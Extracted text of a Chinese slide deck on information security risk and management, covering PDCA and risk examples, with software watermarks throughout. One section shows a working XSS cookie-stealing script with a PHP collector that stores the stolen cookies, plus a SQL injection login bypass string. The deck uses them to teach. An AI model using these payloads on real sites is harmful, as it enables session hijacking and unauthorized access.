l信息安全风险及分析.ppt

没有高级管理层对安全问题的正确理解和有力支持，信息安全工作是很难正常开展的； 信息安全管理人员也应经常站在管理管理层的角度思考问题，在CISSP考试中也是这样； 信息安全管理的能力取决于公司治理水平； 信息安全管理专业人员应该有能力、有行动影响高官，帮助其形成信息安全管理的正确观念。 10:40左右结束，休息10分钟 计划是对各种活动进行规划和安排的活动和文档，通过计划进行管理的现代管理的基本方法； 自下而上是一种理想的安全管理推行模式，不过实际工作中经常是自下而上的； 从最高管理者到一般用户在计划的制定和实施过程中有各自的责任，并非都是安全专业人员在责任； 计划的制定应该有层次性，层次关系应该明确、顺畅。 风险举例： 敏感信息泄漏导致机构市场能力遭到损害的风险； 重要信息被篡改导致资金损失的风险； 信息系统设备丢失或被损坏导致财产损失的风险； 信息系统故障造成业务中断的风险； 信息资产面临的风险有很多； 信息安全管理从本质上就是对信息资产的风险进行管理，所以风险管理的概念和方法在信息安全工作中将贯彻始终，是最核心的信息安全方法。 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 技术和管理孰重孰轻的争论由来已久，从来没有停止过； 管理人员和技术人员对这个问题的错误看法严重影响信息安全工作； 举例摄影届关于两头的争论，说明人是信息安全中最关键的因素。 技术和管理孰重孰轻的争论由来已久，从来没有停止过； 管理人员和技术人员对这个问题的错误看法严重影响信息安全工作； 举例摄影届关于两头的争论，说明人是信息安全中最关键的因素。 著名的PDCA管理模型 这不仅是信息安全管理的基本方法，也是所有管理活动应遵循的方法，由此可见信息安全管理是机构管理不可分割的有机组成部分； 叙述各部分的作用和基本工作内容，说明信息安全工作是一个不断改进的工作过程，而不可能是一蹴而就的； 信息安全管理工作也应该引入能力成熟度的概念。 SQL INJECTION 针对网站的攻击 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. XSS 跨站脚本 构建了个 Javascript 脚本传递客户端的 cookie 到黑客的服务器 Javascript 脚本可以简单的这样写 var img = new Image(); img.src = ‘get_cookie.php?var=’ + encodeURI(document.cookie); 然后服务器端使用 PHP 简单写了个脚本保存 Cookie 数据 ?php if (isset($_GET[‘var’])) { ? ? file_put_contents(‘./cookie/’.time().‘.txt’, urldecode($_GET[‘var’])); } ? Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. 构造SQL登陆语句 用户名: admin 密码: 1’ or ‘1’=‘1 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. 其他例子 击键记录 Office文档挂栽木马 网页木马 木马捆绑 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. 信息安全管理概述 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-2011 Aspose Pty Ltd. 例一： 局域网内病毒泛滥成灾。 例二： 网络中为什么会有ARP欺骗的问题发生 例三： 局域网内计算机故障频繁发生 例四： 为什么要给每个用户管理员权限 先来分析两个例子 Evaluation only. Created with Aspose.Slides for .NET 3.5 Client Profile . Copyright 2004-20